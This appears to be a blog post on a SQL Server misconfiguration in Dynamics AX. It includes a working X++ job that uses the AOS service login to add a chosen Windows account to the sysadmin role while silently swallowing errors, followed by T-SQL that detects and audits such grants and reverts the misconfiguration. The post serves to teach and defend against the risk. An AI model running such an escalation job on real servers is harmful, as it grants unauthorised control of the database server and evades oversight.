The Dynamics AX AOS service login needs only a few permissions on the SQL Server, and keeping it that restricted is what stops developers from doing anything unexpected directly against the database. But when a DBA does not think it through, the setup can turn into a security issue.
Eg.
A DBA is asked to look at an AOS start-up problem. Rather than diagnosing and fixing it properly, they grant the sysadmin server role to the AOS service login as a quick fix. Under urgency or pressure this may seem like a harmless shortcut, but it creates a real security risk. Although the role is granted only to the AOS service login, any developer with AOT access can now issue a direct SQL statement through that login and grant themselves the sysadmin role.
Running the job below (from the AOT, so it executes under the AOS service login) would grant the sysadmin role.
    // X++ job: runs on the AOS, so the connection below uses the AOS service login.
    // If that login is sysadmin, this statement succeeds and the named Windows
    // account becomes sysadmin on the SQL Server instance.
    static void UpdateSQL(Args _args)
    {
        str                          sql;
        Connection                   connection = new Connection();
        SqlStatementExecutePermission sqlPerm;
        Statement                    statement;
        int                          rowsAffected;
        ;
        try
        {
            // Direct SQL against the master database; 'Domain\Username' is the account to elevate.
            sql = "EXEC master..sp_addsrvrolemember @loginame = N'Domain\\Username', @rolename = N'sysadmin'";

            // Code access security: assert permission to execute raw SQL from X++.
            sqlPerm = new SqlStatementExecutePermission(sql);
            sqlPerm.assert();

            statement    = connection.createStatement();
            rowsAffected = statement.executeUpdate(sql);

            CodeAccessPermission::revertAssert();
        }
        catch
        {
            // Errors (e.g. the AOS login is not sysadmin) are swallowed silently.
        }
    }
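An added check for the DBA side, not code from the original post: the T-SQL below lists the current sysadmin members so the AOS service login can be spotted, removes it from the role, and sets up a server audit so any later role-membership change (such as the one the X++ job above issues) is recorded together with the login that made it. The login name 'Domain\AOSService', the audit name and the file path are placeholders.

```sql
-- Added example (not from the original post). Placeholders: the AOS service
-- login is assumed to be 'Domain\AOSService'; the audit folder must already exist.

-- 1. Who is sysadmin right now? The AOS service login should not be in this list.
SELECT
    m.name        AS member_login,
    m.type_desc   AS login_type,
    m.is_disabled,
    CASE WHEN m.name = N'Domain\AOSService'
         THEN 'AOS service login is sysadmin - remove it'
         ELSE 'review' END AS note
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;

-- 2. Direct yes/no check for one login (1 = member, 0 = not a member, NULL = login not found).
SELECT IS_SRVROLEMEMBER(N'sysadmin', N'Domain\AOSService') AS aos_is_sysadmin;

-- 3. Revert the "quick fix": take the AOS service login out of sysadmin.
ALTER SERVER ROLE sysadmin DROP MEMBER [Domain\AOSService];
GO

-- 4. Audit future server-role membership changes so a grant issued through the
--    AOS login shows up with timestamp, issuing principal and full statement.
CREATE SERVER AUDIT AosRoleChangeAudit
    TO FILE (FILEPATH = N'C:\SqlAudit\')        -- placeholder path
    WITH (ON_FAILURE = CONTINUE);
GO
CREATE SERVER AUDIT SPECIFICATION AosRoleChangeAuditSpec
    FOR SERVER AUDIT AosRoleChangeAudit
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP)
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT AosRoleChangeAudit WITH (STATE = ON);
GO

-- 5. Review what the audit captured (run later, after the audit has been active).
SELECT event_time, server_principal_name, statement
FROM sys.fn_get_audit_file(N'C:\SqlAudit\*', DEFAULT, DEFAULT)
ORDER BY event_time DESC;
```

Step 1 is the quick check to run after any "just make it sysadmin" troubleshooting session; steps 4 and 5 make the next such grant visible rather than silent.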